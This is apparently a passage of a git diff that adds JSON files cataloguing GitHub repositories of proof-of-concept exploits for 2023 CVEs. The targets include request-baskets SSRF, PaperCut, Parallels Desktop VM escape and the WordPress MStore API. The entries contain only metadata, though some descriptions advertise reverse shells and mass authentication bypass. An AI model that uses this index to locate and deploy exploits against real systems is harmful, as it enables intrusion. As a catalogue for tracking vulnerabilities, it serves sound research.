CVE-2023-27163", + "fork": false, + "created_at": "2023-07-19T04:35:58Z", + "updated_at": "2023-07-31T23:33:29Z", + "pushed_at": "2023-07-22T05:56:55Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 668492282, + "name": "CVE-2023-27163", + "full_name": "overgrowncarrot1\/CVE-2023-27163", + "owner": { + "login": "overgrowncarrot1", + "id": 78485709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78485709?v=4", + "html_url": "https:\/\/github.com\/overgrowncarrot1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/overgrowncarrot1\/CVE-2023-27163", + "description": "CVE-2023-27163", + "fork": false, + "created_at": "2023-07-20T00:18:38Z", + "updated_at": "2023-07-20T00:19:34Z", + "pushed_at": "2023-07-20T00:58:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 671018679, + "name": "CVE-2023-27163-POC", + "full_name": "ThickCoco\/CVE-2023-27163-POC", + "owner": { + "login": "ThickCoco", + "id": 26300723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26300723?v=4", + "html_url": "https:\/\/github.com\/ThickCoco", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThickCoco\/CVE-2023-27163-POC", + "description": "Poc of SSRF for Request-Baskets (CVE-2023-27163)", + "fork": false, + "created_at": "2023-07-26T11:00:59Z", + "updated_at": "2024-09-18T18:11:04Z", + "pushed_at": "2023-07-26T13:35:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 671124763, + "name": "CVE-2023-27163", + "full_name": "davuXVI\/CVE-2023-27163", + "owner": { + "login": "davuXVI", + "id": 99289325, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99289325?v=4", + "html_url": "https:\/\/github.com\/davuXVI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/davuXVI\/CVE-2023-27163", + "description": "PoC CVE-2023-27163, SSRF, request-baskets hasta v1.2.1", + "fork": false, + "created_at": "2023-07-26T15:37:26Z", + "updated_at": "2023-08-05T10:44:44Z", + "pushed_at": "2023-07-26T16:20:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 674953694, + "name": "CVE-2023-27163-AND-Mailtrail-v0.53", + "full_name": "HusenjanDev\/CVE-2023-27163-AND-Mailtrail-v0.53", + "owner": { + "login": "HusenjanDev", + "id": 88688451, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88688451?v=4", + "html_url": "https:\/\/github.com\/HusenjanDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HusenjanDev\/CVE-2023-27163-AND-Mailtrail-v0.53", + "description": "Requests Baskets (CVE-2023-27163) and Mailtrail v0.53", + "fork": false, + "created_at": "2023-08-05T09:32:00Z", + "updated_at": "2024-01-07T07:09:20Z", + "pushed_at": "2023-08-05T09:36:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 676501688, + "name": "CVE-2023-27163", + "full_name": "rvizx\/CVE-2023-27163", + "owner": { + "login": "rvizx", + "id": 84989569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84989569?v=4", + "html_url": "https:\/\/github.com\/rvizx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rvizx\/CVE-2023-27163", + "description": "CVE-2023-27163 - Request Baskets SSRF", + "fork": false, + "created_at": "2023-08-09T10:47:01Z", + "updated_at": "2024-11-02T19:55:00Z", + "pushed_at": "2023-08-09T20:44:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-27163", + "exploit", + "request-baskets", + "ssrf" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 677914975, + "name": "CVE-2023-27163", + "full_name": "thomas-osgood\/CVE-2023-27163", + "owner": { + "login": "thomas-osgood", + "id": 20747585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20747585?v=4", + "html_url": "https:\/\/github.com\/thomas-osgood", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thomas-osgood\/CVE-2023-27163", + "description": "Golang PoC for CVE-2023-27163 Mailtrail Exploit", + "fork": false, + "created_at": "2023-08-13T04:19:50Z", + "updated_at": "2024-11-19T01:29:58Z", + "pushed_at": "2023-08-14T06:11:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 677969095, + "name": "CVE-2023-27163", + "full_name": "cowsecurity\/CVE-2023-27163", + "owner": { + "login": "cowsecurity", + "id": 74612612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74612612?v=4", + "html_url": "https:\/\/github.com\/cowsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cowsecurity\/CVE-2023-27163", + "description": "CVE-2023-27163 Request-Baskets v1.2.1 - Server-side request forgery (SSRF)", + "fork": false, + "created_at": "2023-08-13T08:49:24Z", + "updated_at": "2023-08-13T08:52:33Z", + "pushed_at": "2023-08-13T09:04:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 684184490, + "name": "CVE-2023-27163-InternalProber", + "full_name": "samh4cks\/CVE-2023-27163-InternalProber", + "owner": { + "login": "samh4cks", + "id": 63656641, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63656641?v=4", + "html_url": "https:\/\/github.com\/samh4cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/samh4cks\/CVE-2023-27163-InternalProber", + "description": "A tool to perform port scanning using vulnerable Request-Baskets", + "fork": false, + "created_at": "2023-08-28T16:19:21Z", + "updated_at": "2024-08-12T20:32:38Z", + "pushed_at": "2023-08-28T17:52:19Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 694447661, + "name": "CVE-2023-27163", + "full_name": "Hamibubu\/CVE-2023-27163", + "owner": { + "login": "Hamibubu", + "id": 108554878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108554878?v=4", + "html_url": "https:\/\/github.com\/Hamibubu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hamibubu\/CVE-2023-27163", + "description": "Python implementation of CVE-2023-27163", + "fork": false, + "created_at": "2023-09-21T02:43:02Z", + "updated_at": "2023-09-21T02:55:11Z", + "pushed_at": "2023-09-21T03:05:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 733795826, + "name": "basketcraft", + "full_name": "KharimMchatta\/basketcraft", + "owner": { + "login": "KharimMchatta", + "id": 47448636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47448636?v=4", + "html_url": "https:\/\/github.com\/KharimMchatta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KharimMchatta\/basketcraft", + "description": "this is a script that exploits the CVE-2023-27163 vulnerability which is request-basket SSRF", + "fork": false, + "created_at": "2023-12-20T06:29:18Z", + "updated_at": "2024-01-05T18:44:44Z", + "pushed_at": "2023-12-20T07:00:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736614226, + "name": "CVE-2023-27163", + "full_name": "MasterCode112\/CVE-2023-27163", + "owner": { + "login": "MasterCode112", + "id": 105772414, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105772414?v=4", + "html_url": "https:\/\/github.com\/MasterCode112", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MasterCode112\/CVE-2023-27163", + "description": "Proof of Concept for Server Side Request Forgery (SSRF) in request-baskets (V<= v.1.2.1)", + "fork": false, + "created_at": "2023-12-28T11:36:37Z", + "updated_at": "2023-12-28T11:45:13Z", + "pushed_at": "2024-01-10T07:57:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 739001610, + "name": "CVE-2023-27163", + "full_name": "Rubioo02\/CVE-2023-27163", + "owner": { + "login": "Rubioo02", + "id": 153825296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153825296?v=4", + "html_url": "https:\/\/github.com\/Rubioo02", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rubioo02\/CVE-2023-27163", + "description": "A exploit for the CVE-2023-27163 (SSRF) vulnerability in the web application request-baskets (<= v.1.2.1)", + "fork": false, + "created_at": "2024-01-04T14:46:13Z", + "updated_at": "2024-01-04T17:04:49Z", + "pushed_at": "2024-01-04T16:40:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 739760866, + "name": "CVE-2023-27163", + "full_name": "madhavmehndiratta\/CVE-2023-27163", + "owner": { + "login": "madhavmehndiratta", + "id": 43489174, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43489174?v=4", + "html_url": "https:\/\/github.com\/madhavmehndiratta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/madhavmehndiratta\/CVE-2023-27163", + "description": "PoC for SSRF in request-baskets v1.2.1 (CVE-2023-27163)", + "fork": false, + "created_at": "2024-01-06T13:16:29Z", + "updated_at": "2024-01-06T15:53:16Z", + "pushed_at": "2024-01-06T15:52:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 820848497, + "name": "CVE-2023-27163-ssrf-to-port-scanning", + "full_name": "Rishabh-Kumar-Cyber-Sec\/CVE-2023-27163-ssrf-to-port-scanning", + "owner": { + "login": "Rishabh-Kumar-Cyber-Sec", + "id": 58937379, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58937379?v=4", + "html_url": "https:\/\/github.com\/Rishabh-Kumar-Cyber-Sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rishabh-Kumar-Cyber-Sec\/CVE-2023-27163-ssrf-to-port-scanning", + "description": "It is a simple script to automate internal port scanning dueto SSRF in requests-baskets v 1.2.1. this script can also assisst in solving 'SAU' machine from hackthebox", + "fork": false, + "created_at": "2024-06-27T09:48:14Z", + "updated_at": "2024-06-27T09:53:26Z", + "pushed_at": "2024-06-27T09:53:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 861116698, + "name": "exploit_CVE-2023-27163", + "full_name": "btar1gan\/exploit_CVE-2023-27163", + "owner": { + "login": "btar1gan", + "id": 92728059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92728059?v=4", + "html_url": "https:\/\/github.com\/btar1gan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/btar1gan\/exploit_CVE-2023-27163", + "description": null, + "fork": false, + "created_at": "2024-09-22T03:33:18Z", + "updated_at": "2024-09-22T03:33:56Z", + "pushed_at": "2024-09-22T03:33:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27216.json b/2023/CVE-2023-27216.json new file mode 100644 index 0000000000..042615ba2e --- /dev/null +++ b/2023/CVE-2023-27216.json @@ -0,0 +1,64 @@ +[ + { + "id": 629452234, + "name": "CVE-2023-27216_D-Link_DSL-3782_Router_command_injection", + "full_name": "FzBacon\/CVE-2023-27216_D-Link_DSL-3782_Router_command_injection", + "owner": { + "login": "FzBacon", + "id": 48304150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48304150?v=4", + "html_url": "https:\/\/github.com\/FzBacon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FzBacon\/CVE-2023-27216_D-Link_DSL-3782_Router_command_injection", + "description": null, + "fork": false, + "created_at": "2023-04-18T10:45:42Z", + "updated_at": "2024-05-03T15:55:26Z", + "pushed_at": "2023-04-18T10:45:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840260411, + "name": "CVE-2023-27216", + "full_name": "HoangREALER\/CVE-2023-27216", + "owner": { + "login": "HoangREALER", + "id": 90048856, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90048856?v=4", + "html_url": "https:\/\/github.com\/HoangREALER", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HoangREALER\/CVE-2023-27216", + "description": "Newbie's approach to firmware hacking", + "fork": false, + "created_at": "2024-08-09T10:05:34Z", + "updated_at": "2024-10-11T00:57:22Z", + "pushed_at": "2024-08-13T13:40:34Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2728.json b/2023/CVE-2023-2728.json new file mode 100644 index 0000000000..0dd85e55c8 --- /dev/null +++ b/2023/CVE-2023-2728.json @@ -0,0 +1,33 @@ +[ + { + "id": 852879948, + "name": "Metasploit-Module-TFM", + "full_name": "Cgv-Dev\/Metasploit-Module-TFM", + "owner": { + "login": "Cgv-Dev", + "id": 128702955, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128702955?v=4", + "html_url": "https:\/\/github.com\/Cgv-Dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cgv-Dev\/Metasploit-Module-TFM", + "description": "Module written in Ruby with the objective of exploiting vulnerabilities CVE-2023-2728 and CVE-2024-3177, both related to the secret mount policy in a Kubernetes cluster using a custom Metasploit module. Part of a Cybersecurity Master's degree finalization project.", + "fork": false, + "created_at": "2024-09-05T15:30:51Z", + "updated_at": "2024-09-05T17:44:53Z", + "pushed_at": "2024-09-05T17:44:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2732.json b/2023/CVE-2023-2732.json new file mode 100644 index 0000000000..a84c8d6d95 --- /dev/null +++ b/2023/CVE-2023-2732.json @@ -0,0 +1,99 @@ +[ + { + "id": 645286751, + "name": "CVE-2023-2732", + "full_name": "RandomRobbieBF\/CVE-2023-2732", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-2732", + "description": "MStore API <= 3.9.2 - Authentication Bypass", + "fork": false, + "created_at": "2023-05-25T10:18:48Z", + "updated_at": "2024-10-03T17:05:08Z", + "pushed_at": "2023-05-25T11:09:11Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 649961452, + "name": "WP-CVE-2023-2732", + "full_name": "Jenderal92\/WP-CVE-2023-2732", + "owner": { + "login": "Jenderal92", + "id": 59664965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4", + "html_url": "https:\/\/github.com\/Jenderal92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jenderal92\/WP-CVE-2023-2732", + "description": "Python 2.7", + "fork": false, + "created_at": "2023-06-06T02:59:22Z", + "updated_at": "2024-08-12T20:31:37Z", + "pushed_at": "2023-06-13T22:16:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 674914853, + "name": "CVE-2023-2732", + "full_name": "ThatNotEasy\/CVE-2023-2732", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2023-2732", + "description": "Perform With Massive Authentication Bypass (Wordpress Mstore-API)", + "fork": false, + "created_at": "2023-08-05T06:38:53Z", + "updated_at": "2024-08-12T20:32:21Z", + "pushed_at": "2023-08-05T06:43:33Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication", + "bypass", + "wordpress" + ], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27326.json b/2023/CVE-2023-27326.json new file mode 100644 index 0000000000..d4b4daa13f --- /dev/null +++ b/2023/CVE-2023-27326.json @@ -0,0 +1,73 @@ +[ + { + "id": 616438294, + "name": "CVE-2023-27326", + "full_name": "Impalabs\/CVE-2023-27326", + "owner": { + "login": "Impalabs", + "id": 82209949, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82209949?v=4", + "html_url": "https:\/\/github.com\/Impalabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Impalabs\/CVE-2023-27326", + "description": "VM Escape for Parallels Desktop <18.1.1", + "fork": false, + "created_at": "2023-03-20T11:47:54Z", + "updated_at": "2024-11-06T16:28:22Z", + "pushed_at": "2024-03-15T02:02:35Z", + "stargazers_count": 170, + "watchers_count": 170, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 170, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 636732300, + "name": "CVE-2023-27326", + "full_name": "Malwareman007\/CVE-2023-27326", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2023-27326", + "description": "VM Escape for Parallels Desktop <18.1.1", + "fork": false, + "created_at": "2023-05-05T14:11:18Z", + "updated_at": "2024-08-10T17:57:23Z", + "pushed_at": "2023-05-07T13:24:23Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-27326", + "exploit", + "local-attacker", + "parallel-desktop", + "privilege-escalation", + "toolgate", + "vm", + "vm-escape" + ], + "visibility": "public", + "forks": 6, + "watchers": 38, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27327.json b/2023/CVE-2023-27327.json new file mode 100644 index 0000000000..6e489ae3ac --- /dev/null +++ b/2023/CVE-2023-27327.json @@ -0,0 +1,33 @@ +[ + { + "id": 638653948, + "name": "parallels-plist-escape", + "full_name": "kn32\/parallels-plist-escape", + "owner": { + "login": "kn32", + "id": 105210950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105210950?v=4", + "html_url": "https:\/\/github.com\/kn32", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kn32\/parallels-plist-escape", + "description": "Exploits for CVE-2023-27327 and CVE-2023-27328", + "fork": false, + "created_at": "2023-05-09T20:14:43Z", + "updated_at": "2023-08-17T12:00:48Z", + "pushed_at": "2023-05-09T22:35:28Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27350.json b/2023/CVE-2023-27350.json new file mode 100644 index 0000000000..c2f31030fc --- /dev/null +++ b/2023/CVE-2023-27350.json @@ -0,0 +1,254 @@ +[ + { + "id": 630841704, + "name": "CVE-2023-27350-POC", + "full_name": "MaanVader\/CVE-2023-27350-POC", + "owner": { + "login": "MaanVader", + "id": 103140982, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103140982?v=4", + "html_url": "https:\/\/github.com\/MaanVader", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaanVader\/CVE-2023-27350-POC", + "description": "A simple python script to check if a service is vulnerable", + "fork": false, + "created_at": "2023-04-21T09:19:13Z", + "updated_at": "2024-01-07T22:14:44Z", + "pushed_at": "2023-05-12T13:20:05Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 631055942, + "name": "CVE-2023-27350-POC", + "full_name": "imancybersecurity\/CVE-2023-27350-POC", + "owner": { + "login": "imancybersecurity", + "id": 106005322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106005322?v=4", + "html_url": "https:\/\/github.com\/imancybersecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imancybersecurity\/CVE-2023-27350-POC", + "description": null, + "fork": false, + "created_at": "2023-04-21T20:13:47Z", + "updated_at": "2024-11-14T07:06:43Z", + "pushed_at": "2024-11-14T07:06:40Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 631387134, + "name": "CVE-2023-27350", + "full_name": "horizon3ai\/CVE-2023-27350", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2023-27350", + "description": "Proof of Concept Exploit for PaperCut CVE-2023-27350", + "fork": false, + "created_at": "2023-04-22T21:34:06Z", + "updated_at": "2024-11-08T23:46:27Z", + "pushed_at": "2023-05-01T19:31:20Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 47, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 632645209, + "name": "CVE-2023-27350", + "full_name": "adhikara13\/CVE-2023-27350", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2023-27350", + "description": "Exploit for Papercut CVE-2023-27350. [+] Reverse shell [+] Mass checking", + "fork": false, + "created_at": "2023-04-25T20:51:23Z", + "updated_at": "2024-03-26T05:53:14Z", + "pushed_at": "2023-04-25T21:34:11Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646129279, + "name": "CVE-2023-27350", + "full_name": "ThatNotEasy\/CVE-2023-27350", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2023-27350", + "description": "Perfom With Massive Authentication Bypass In PaperCut MF\/NG", + "fork": false, + "created_at": "2023-05-27T11:32:35Z", + "updated_at": "2024-08-12T20:31:30Z", + "pushed_at": "2023-07-24T22:21:38Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication-bypass", + "papercut", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 653346311, + "name": "CVE-2023-27350", + "full_name": "Jenderal92\/CVE-2023-27350", + "owner": { + "login": "Jenderal92", + "id": 59664965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4", + "html_url": "https:\/\/github.com\/Jenderal92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jenderal92\/CVE-2023-27350", + "description": "Python 2.7", + "fork": false, + "created_at": "2023-06-13T22:13:24Z", + "updated_at": "2024-08-12T20:31:42Z", + "pushed_at": "2023-06-13T22:25:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788787317, + "name": "CVE-2023-27350", + "full_name": "ASG-CASTLE\/CVE-2023-27350", + "owner": { + "login": "ASG-CASTLE", + "id": 160751832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/160751832?v=4", + "html_url": "https:\/\/github.com\/ASG-CASTLE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ASG-CASTLE\/CVE-2023-27350", + "description": null, + "fork": false, + "created_at": "2024-04-19T04:47:10Z", + "updated_at": "2024-04-19T04:47:11Z", + "pushed_at": "2024-04-19T04:51:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 798859972, + "name": "CVE-2023-27350-Ongoing-Exploitation-of-PaperCut-Remote-Code-Execution-Vulnerability", + "full_name": "rasan2001\/CVE-2023-27350-Ongoing-Exploitation-of-PaperCut-Remote-Code-Execution-Vulnerability", + "owner": { + "login": "rasan2001", + "id": 156652838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156652838?v=4", + "html_url": "https:\/\/github.com\/rasan2001", + "user_view_type": "public" + }, + "html_url": 